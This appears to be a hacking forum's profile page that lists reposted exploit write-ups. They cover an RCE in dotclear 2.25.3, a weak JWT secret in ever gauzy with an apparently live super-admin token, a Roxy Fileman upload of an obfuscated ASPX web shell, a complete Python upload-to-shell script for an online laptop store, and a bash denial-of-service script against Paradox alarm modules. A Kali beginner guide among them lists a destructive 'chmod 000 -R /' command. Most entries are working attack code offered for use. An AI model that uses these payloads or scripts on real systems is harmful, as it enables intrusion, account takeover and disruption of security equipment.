Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated) Application: dotclear Version: 2.25.3 Bugs: Remote Code Execution (RCE) (Authenticated) via file upload Technology: PHP Vendor URL: https://dotclear.org/ Software Link: https://dotclear.org/download Date of found: 08.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== While writing a blog post, we know that we can upload images. But php did not allow file upload. This time <?php echo system("id"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it. We were able to run the php code when we visited your page poc request: POST /dotclear/admin/post.php HTTP/1.1 Host: localhost Content-Length: 566 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1cc Connection: close post_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password= poc video : https://youtu.be/oIPyLqLJS70
  2. HireHackking

    ever gauzy v0.281.9 - JWT weak HMAC secret

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: ever gauzy v0.281.9 - JWT weak HMAC secret ## Author: nu11secur1ty ## Date: 04.08.2023 ## Vendor: https://gauzy.co/ ## Software: https://github.com/ever-co/ever-gauzy/releases/tag/v0.281.9 ## Reference: https://portswigger.net/kb/issues/00200903_jwt-weak-hmac-secret ## Description: It was, detected a JWT signed using a well-known `HMAC secret key`. The key used which was found was a secret Key. The user can find a secret key authentication while sending normal post requests. After he found the `Authorization: Bearer` key he can use it to authenticate and he can be sending a very malicious POST request, it depends on the scenario. STATUS: [+]Issue: JWT weak HMAC secret [+]Severity: High [+]Exploit: ```GET GET /api/auth/authenticated HTTP/2 Host: apidemo.gauzy.co Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112" Accept: application/json, text/plain, */* Language: en Sec-Ch-Ua-Mobile: ?0 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjJjMWViM2ViLTI3ZDEtNGE2Ni05YjEzLTg4ODVhNmFhYWJlMiIsInRlbmFudElkIjoiMTA0YjhiMDQtNmYzNi00YWMzLWFjNWItNTg4MWQyNjJmMWUxIiwiZW1wbG95ZWVJZCI6bnVsbCwicm9sZSI6IlNVUEVSX0FETUlOIiwicGVybWlzc2lvbnMiOlsiQURNSU5fREFTSEJPQVJEX1ZJRVciLCJURUFNX0RBU0hCT0FSRCIsIlBST0pFQ1RfTUFOQUdFTUVOVF9EQVNIQk9BUkQiLCJUSU1FX1RSQUNLSU5HX0RBU0hCT0FSRCIsIkFDQ09VTlRJTkdfREFTSEJPQVJEIiwiSFVNQU5fUkVTT1VSQ0VfREFTSEJPQVJEIiwiT1JHX1BBWU1FTlRfVklFVyIsIk9SR19QQVlNRU5UX0FERF9FRElUIiwiT1JHX0lOQ09NRVNfVklFVyIsIk9SR19JTkNPTUVTX0VESVQiLCJPUkdfRVhQRU5TRVNfVklFVyIsIk9SR19FWFBFTlNFU19FRElUIiwiUFJPRklMRV9FRElUIiwiRU1QTE9ZRUVfRVhQRU5TRVNfVklFVyIsIkVNUExPWUVFX0VYUEVOU0VTX0VESVQiLCJPUkdfUFJPUE9TQUxTX1ZJRVciLCJPUkdfUFJPUE9TQUxTX0VESVQiLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX1ZJRVciLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX0VESVQiLCJPUkdfVEFTS19BREQiLCJPUkdfVEFTS19WSUVXIiwiT1JHX1RBU0tfRURJVCIsIk9SR19UQVNLX0RFTEVURSIsIk9SR19USU1FX09GRl9WSUVXIiwiT1JHX0VNUExPWUVFU19WSUVXIiwiT1JHX0VNUExPWUVFU19FRElUIiwiT1JHX0NBTkRJREFURVNfVklFVyIsIk9SR19DQU5ESURBVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV19WSUVXIiwiT1JHX0NBTkRJREFURVNfRE9DVU1FTlRTX1ZJRVciLCJPUkdfQ0FORElEQVRFU19UQVNLX0VESVQiLCJPUkdfQ0FORElEQVRFU19GRUVEQkFDS19FRElUIiwiT1JHX0lOVkVOVE9SWV9QUk9EVUNUX0VESVQiLCJPUkdfSU5WRU5UT1JZX1ZJRVciLCJPUkdfVEFHU19BREQiLCJPUkdfVEFHU19WSUVXIiwiT1JHX1RBR1NfRURJVCIsIk9SR19UQUdTX0RFTEVURSIsIk9SR19VU0VSU19WSUVXIiwiT1JHX1VTRVJTX0VESVQiLCJPUkdfSU5WSVRFX1ZJRVciLCJPUkdfSU5WSVRFX0VESVQiLCJBTExfT1JHX1ZJRVciLCJBTExfT1JHX0VESVQiLCJQT0xJQ1lfVklFVyIsIlBPTElDWV9FRElUIiwiVElNRV9PRkZfRURJVCIsIlJFUVVFU1RfQVBQUk9WQUxfVklFVyIsIlJFUVVFU1RfQVBQUk9WQUxfRURJVCIsIkFQUFJPVkFMU19QT0xJQ1lfVklFVyIsIkFQUFJPVkFMU19QT0xJQ1lfRURJVCIsIkNIQU5HRV9TRUxFQ1RFRF9FTVBMT1lFRSIsIkNIQU5HRV9TRUxFQ1RFRF9DQU5ESURBVEUiLCJDSEFOR0VfU0VMRUNURURfT1JHQU5JWkFUSU9OIiwiQ0hBTkdFX1JPTEVTX1BFUk1JU1NJT05TIiwiQUNDRVNTX1BSSVZBVEVfUFJPSkVDVFMiLCJUSU1FU0hFRVRfRURJVF9USU1FIiwiU1VQRVJfQURNSU5fRURJVCIsIlBVQkxJQ19QQUdFX0VESVQiLCJJTlZPSUNFU19WSUVXIiwiSU5WT0lDRVNfRURJVCIsIkVTVElNQVRFU19WSUVXIiwiRVNUSU1BVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdFUlNfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV0VSU19WSUVXIiwiVklFV19BTExfRU1BSUxTIiwiVklFV19BTExfRU1BSUxfVEVNUExBVEVTIiwiT1JHX0hFTFBfQ0VOVEVSX0VESVQiLCJWSUVXX1NBTEVTX1BJUEVMSU5FUyIsIkVESVRfU0FMRVNfUElQRUxJTkVTIiwiQ0FOX0FQUFJPVkVfVElNRVNIRUVUIiwiT1JHX1NQUklOVF9WSUVXIiwiT1JHX1NQUklOVF9FRElUIiwiT1JHX0NPTlRBQ1RfRURJVCIsIk9SR19DT05UQUNUX1ZJRVciLCJPUkdfUFJPSkVDVF9BREQiLCJPUkdfUFJPSkVDVF9WSUVXIiwiT1JHX1BST0pFQ1RfRURJVCIsIk9SR19QUk9KRUNUX0RFTEVURSIsIk9SR19URUFNX0FERCIsIk9SR19URUFNX1ZJRVciLCJPUkdfVEVBTV9FRElUIiwiT1JHX1RFQU1fREVMRVRFIiwiT1JHX1RFQU1fSk9JTl9SRVFVRVNUX1ZJRVciLCJPUkdfVEVBTV9KT0lOX1JFUVVFU1RfRURJVCIsIk9SR19DT05UUkFDVF9FRElUIiwiRVZFTlRfVFlQRVNfVklFVyIsIlRJTUVfVFJBQ0tFUiIsIlRFTkFOVF9BRERfRVhJU1RJTkdfVVNFUiIsIklOVEVHUkFUSU9OX1ZJRVciLCJGSUxFX1NUT1JBR0VfVklFVyIsIlBBWU1FTlRfR0FURVdBWV9WSUVXIiwiU01TX0dBVEVXQVlfVklFVyIsIkNVU1RPTV9TTVRQX1ZJRVciLCJJTVBPUlRfRVhQT1JUX1ZJRVciLCJNSUdSQVRFX0dBVVpZX0NMT1VEIiwiT1JHX0pPQl9FTVBMT1lFRV9WSUVXIiwiT1JHX0pPQl9NQVRDSElOR19WSUVXIiwiSU5WRU5UT1JZX0dBTExFUllfQUREIiwiSU5WRU5UT1JZX0dBTExFUllfVklFVyIsIklOVkVOVE9SWV9HQUxMRVJZX0VESVQiLCJJTlZFTlRPUllfR0FMTEVSWV9ERUxFVEUiLCJNRURJQV9HQUxMRVJZX0FERCIsIk1FRElBX0dBTExFUllfVklFVyIsIk1FRElBX0dBTExFUllfRURJVCIsIk1FRElBX0dBTExFUllfREVMRVRFIiwiT1JHX0VRVUlQTUVOVF9WSUVXIiwiT1JHX0VRVUlQTUVOVF9FRElUIiwiT1JHX0VRVUlQTUVOVF9TSEFSSU5HX1ZJRVciLCJPUkdfRVFVSVBNRU5UX1NIQVJJTkdfRURJVCIsIkVRVUlQTUVOVF9NQUtFX1JFUVVFU1QiLCJFUVVJUE1FTlRfQVBQUk9WRV9SRVFVRVNUIiwiT1JHX1BST0RVQ1RfVFlQRVNfVklFVyIsIk9SR19QUk9EVUNUX1RZUEVTX0VESVQiLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX1ZJRVciLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX0VESVQiLCJWSUVXX0FMTF9BQ0NPVU5USU5HX1RFTVBMQVRFUyIsIlRFTkFOVF9TRVRUSU5HIiwiQUxMT1dfREVMRVRFX1RJTUUiLCJBTExPV19NT0RJRllfVElNRSIsIkFMTE9XX01BTlVBTF9USU1FIiwiREVMRVRFX1NDUkVFTlNIT1RTIl0sImlhdCI6MTY4MDk4MDAzMn0.3zm2CQ0udVj5VCBYgPPD8BzkhQ_5TgVVi91sN7eMKlw User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://demo.gauzy.co Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.gauzy.co/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Length: 76 { "email":"local.admin@ever.co", "password": "adminrrrrrrrrrrrrrrrrrrrrrHACKED" } ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/gauzy.co/2023/ever-gauzy-v0.281.9) ## Proof and Exploit: [href](https://streamable.com/afsmee) ## Time spend: 03:37:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  3. HireHackking

    Title: Getting Started with Kali Linux Newbie

    HireHackking posted a blog entry in Hacker Technology
    Preface This article is about a friend who is just studying kali. This article will start from the following aspects: the command, artifact, penetration test, and three aspects. If there are any other aspects that are not involved, please leave a message below for my convenience! The original work of this article is Xiaoyaozi. If you need to reprint it, please contact the author first. You can only reprint it after agreeing. At the same time, you can join the QQ communication group: (618207388) or follow the WeChat public account kali hacker teaching or kali forum to update simultaneously! What is kali linux Kali is a Debian-based Linux distribution. Its goal is to simplify: include as many penetration and audit tools as possible in a practical toolkit. Kali Linux is an open source project that is maintained and funded by Offensive Security, a provider of world-class information security training and penetration testing services. kali installation USB disk installation virtual machine installation (recommended) Physical machine installation Raspberry Pi (a superior device in the world of pretending) kali installation (vm) configuration Memory 2G (minimum) hard disk (20-40G) wireless network card (recommended 8187) processor 4 cores kali can install graphical interfaces or use only command line interfaces. According to your actual situation, if your device is relatively high-end, it is recommended to install a graphical interface. If the device is not high-end, it is recommended to install a command interface such as Raspberry Pi. Otherwise the graphical interface will take up a lot of resources. It should be noted that in Kali, the two interfaces can be switched to each other. Reference article: Switching of kalilinux's graphical interface and text interface Switch files of kalilinux's graphical interface and text interface to modify whether the graphics configuration is enabled: the file that configures the graphical line interface is vi /etc/def. It should be noted that the default username of kali is root password is goor kali Commands File Operation Copy Move Delete Copy the file cp /root/123.txt /var/www Copy 123.txt in the root directory to the /var/www directory. Move files mv /root/123.txt /var/www delete file rm 123.txtps: Delete the entire file under folder 123 rm -rf 123 Change paths and create folders View the current path pwd switch directory cd /var/www create folder mkdir hacker Text Operation View File cat The most commonly used cat command is. Note that if the file is large, the output result of the cat command will be output on the terminal crazily. You can press ctrl+c multiple times to terminate. View file size du -h file View file content cat file Since cat has this problem, for larger files, we can use the less command to open a file. Similar to vim, less can enter the search mode after input/, and then press n(N) to search down (upper). There are many operations, all similar to vim, you can take a look at it in an analogy. tail Most students who do server development understand this command. For example, check nginx's scrolling log. tail -f access.logtail command can statically view the last n lines of a file, and correspondingly, the head command can view the n lines of the file header. But the head does not have a scrolling function, just like the tail is growing outward and will not grow inward. tail -n100 access.log head -n100 access.log Other grep grep is used to filter the content, with the --color parameter, which can print colors at the supported terminal, and the parameter n outputs the specific number of lines for quick positioning. For example: Check the POST request in nginx log. grep -rn --color POST access.log recommends using such parameters every time. If I want to see the relevant content before and after an exception, I can use the ABC parameter. They are abbreviations for several words and are often used. A after content n lines B before content n lines C count? N lines before and after content It's like this: grep -rn --color Exception -A10 -B2 error.logdiff The diff command is used to compare the differences between two files. Of course, this function is provided in the ide, and diff is just the original tradeoff under the command line. By the way, diff and patch are also patching methods for some platform source code. If you don’t use it, just pass it. Compression and decompression command In order to reduce the size of the transferred file, compression is generally enabled. Common compressed files under Linux include tar, bzip2, zip, rar, etc. 7z is used relatively rarely. tar compress or decompress bz2 using the tar command operate gz using the gzip command operate zip using the unzip command decompress rar use the unrar command to decompress The most commonly used file format is the .tar.gz file format. In fact, it is after tar package and then compressed using gzip. Create a compressed file tar cvfz archive.tar.gz dir/ Decompression tar xvfz. archive.tar.gz Other common commands chown chown Used to change the user and group of files. chmod is used to change the access permissions of files. Both commands are related to linux's file permissions 777. Example: Destructive Command chmod 000 -R/Modify the user and group of directory a to xjj chown -R xjj:xjj a adds execution permissions to a.sh file (this is too common) chmod a+x a.shyum Assuming you are using centos, the package management tool is yum. If your system does not have a wget command, you can use the following command to install it. yum install wget -ysystemctl Of course, there are some tricks to manage the backend service in centos. The service command is. Systemctl is compatible with service commands. Let's take a look at how to restart mysql service. Recommended to use the following. service mysql restart systemctl restart mysqld For ordinary processes, you need to use the kill command for more detailed control. There are many signals for kill command. If you are using kill -9, you must want to understand the differences and uses of kill -15 and kill -3. su su is used to switch users. For example, if you are root now and want to use xjj users to do some activities, you can use su to switch. su xjj su - xjj
  4. HireHackking

    Roxy Fileman 1.4.5 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Roxy Fileman 1.4.5 - Arbitrary File Upload # Date: 09/04/2023 # Exploit Author: Zer0FauLT [admindeepsec@proton.me] # Vendor Homepage: roxyfileman.com # Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net # Version: <= 1.4.5 # Tested on: Windows 10 and Windows Server 2019 # CVE : 0DAY ########################################################################################## # First, we upload the .jpg shell file to the server. # ########################################################################################## POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 666 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJ Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="action" upload ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="method" ajax ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="d" /Upload/PenTest ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="files[]"; filename="test.jpg" Content-Type: image/jpeg ‰PNG <%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %> <%var PAY:String= Request["\x61\x62\x63\x64"];eval (PAY,"\x75\x6E\x73\x61"+ "\x66\x65");%> ------WebKitFormBoundarygOxjsc2hpmwmISeJ-- ########################################################################################## # In the second stage, we manipulate the .jpg file that we uploaded to the server. # ########################################################################################## { "FILES_ROOT": "", "RETURN_URL_PREFIX": "", "SESSION_PATH_KEY": "", "THUMBS_VIEW_WIDTH": "140", "THUMBS_VIEW_HEIGHT": "120", "PREVIEW_THUMB_WIDTH": "300", "PREVIEW_THUMB_HEIGHT":"200", "MAX_IMAGE_WIDTH": "1000", "MAX_IMAGE_HEIGHT": "1000", "INTEGRATION": "ckeditor", "DIRLIST": "asp_net/main.ashx?a=DIRLIST", "CREATEDIR": "asp_net/main.ashx?a=CREATEDIR", "DELETEDIR": "asp_net/main.ashx?a=DELETEDIR", "MOVEDIR": "asp_net/main.ashx?a=MOVEDIR", "COPYDIR": "asp_net/main.ashx?a=COPYDIR", "RENAMEDIR": "asp_net/main.ashx?a=RENAMEDIR", "FILESLIST": "asp_net/main.ashx?a=FILESLIST", "UPLOAD": "asp_net/main.ashx?a=UPLOAD", "DOWNLOAD": "asp_net/main.ashx?a=DOWNLOAD", "DOWNLOADDIR": "asp_net/main.ashx?a=DOWNLOADDIR", "DELETEFILE": "asp_net/main.ashx?a=DELETEFILE", "MOVEFILE": "asp_net/main.ashx?a=MOVEFILE", "COPYFILE": "asp_net/main.ashx?a=COPYFILE", "RENAMEFILE": "asp_net/main.ashx?a=RENAMEFILE", "GENERATETHUMB": "asp_net/main.ashx?a=GENERATETHUMB", "DEFAULTVIEW": "list", "FORBIDDEN_UPLOADS": "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess", "ALLOWED_UPLOADS": "bmp gif png jpg jpeg", "FILEPERMISSIONS": "0644", "DIRPERMISSIONS": "0755", "LANG": "auto", "DATEFORMAT": "dd/MM/yyyy HH:mm", "OPEN_LAST_DIR": "yes" } ############################################################################################################################################################################################################################ # We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows. # ############################################################################################################################################################################################################################ POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 44 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx =========================================================================================================================================================================================================================== POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 68 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx ########################################################################################## # and it's done! # ########################################################################################## HTTP/2 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/10.0 X-Aspnet-Version: 4.0.30319 X-Powered-By-Plesk: PleskWin Date: Sun, 09 Apr 2023 09:49:34 GMT Content-Length: 21 {"res":"ok","msg":""} =============================================================================================
  5. HireHackking

    Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python3 # Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE) # Date: 09/04/2023 # Exploit Author: Matisse Beckandt (Backendt) # Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip # Version: 1.0 # Tested on: Debian 11.6 # CVE : CVE-2023-1826 # Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution. import requests from argparse import ArgumentParser from uuid import uuid4 from datetime import datetime, timezone def interactiveShell(fileUrl: str): print("Entering pseudo-shell. Type 'exit' to quit") while True: command = input("\n$ ") if command == "exit": break response = requests.get(f"{fileUrl}?cmd={command}") print(response.text) def uploadFile(url: str, filename: str, content): endpoint = f"{url}/classes/SystemSettings.php?f=update_settings" file = {"img": (filename, content)} response = requests.post(endpoint, files=file) return response def getUploadedFileUrl(url: str, filename: str): timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes epoch = int(timeNow.timestamp()) # Time in milliseconds possibleFilename = f"{epoch}_{filename}" fileUrl = f"{url}/uploads/{possibleFilename}" response = requests.get(fileUrl) if response.status_code == 200: return fileUrl def exploit(url: str): filename = str(uuid4()) + ".php" content = "<?php system($_GET['cmd'])?>" response = uploadFile(url, filename, content) if response.status_code != 200: print(f"[File Upload] Got status code {response.status_code}. Expected 200.") uploadedUrl = getUploadedFileUrl(url, filename) if uploadedUrl == None: print("Error. Could not find the uploaded file.") exit(1) print(f"Uploaded file is at {uploadedUrl}") try: interactiveShell(uploadedUrl) except KeyboardInterrupt: pass print("\nQuitting.") def getWebsiteURL(url: str): if not url.startswith("http"): url = "http://" + url if url.endswith("/"): url = url[:-1] return url def main(): parser = ArgumentParser(description="Exploit for CVE-2023-1826") parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/") args = parser.parse_args() url = getWebsiteURL(args.url) exploit(url) if __name__ == "__main__": main()
  6. HireHackking

    Paradox Security Systems IPR512 - Denial Of Service

    HireHackking posted a blog entry in Hacker Technology
    #!/bin/bash # Exploit Title: Paradox Security Systems IPR512 - Denial Of Service # Google Dork: intitle:"ipr512 * - login screen" # Date: 09-APR-2023 # Exploit Author: Giorgi Dograshvili # Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423) # Version: IPR512 # CVE : CVE-2023-24709 # Function to display banner message display_banner() { echo "******************************************************" echo "* *" echo "* PoC CVE-2023-24709 *" echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *" echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *" echo "* by SlashXzerozero *" echo "* *" echo "******************************************************" } # Call the function to display the banner display_banner echo "" echo "" echo "Please enter a domain name or IP address with or without port" read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain # Step 2: Ask for user confirmation read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm if [[ $confirm == "Y" || $confirm == "y" ]]; then # Display loading animation animation=("|" "/" "-" "\\") index=0 while [[ $index -lt 10 ]]; do echo -ne "Loading ${animation[index]} \r" sleep 1 index=$((index + 1)) done # Use curl to send HTTP GET request with custom headers and timeout response=$(curl -i -s -k -X GET \ -H "Host: $domain" \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \ -H "Accept: */" \ -H "Referer: http://$domain/login.html" \ -H "Accept-Encoding: gzip, deflate" \ -H "Accept-Language: en-US,en;q=0.9" \ -H "Connection: close" \ --max-time 10 \ "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982") # Check response for HTTP status code 200 and print result if [[ $response == *"HTTP/1.1 200 OK"* ]]; then echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html" else echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html" fi else echo "The script is stopped!." fi
  7. HireHackking

    Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing

    HireHackking posted a blog entry in Hacker Technology
    ## Title: Microsoft-Edge-(Chromium-based)-Webview2-1.0.1661.34-Spoofing-Vulnerability ## Author: nu11secur1ty ## Date: 04.10.2023 ## Vendor: https://developer.microsoft.com/en-us/ ## Software: https://developer.microsoft.com/en-us/microsoft-edge/webview2/ ## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/ ## CVE ID: CVE-2023-24892 ## Description: The Webview2 development platform is vulnerable to Spoofing attacks. The attacker can build a very malicious web app and spread it to the victim's networks. and when they open it this can be the last web app opening for them. STATUS: HIGH Vulnerability [+]Exploit: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892/PoC) ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892) ## Proof and Exploit: [href](https://streamable.com/uk7l2n) ## Time spend: 03:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  8. HireHackking

    BrainyCP V1.0 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
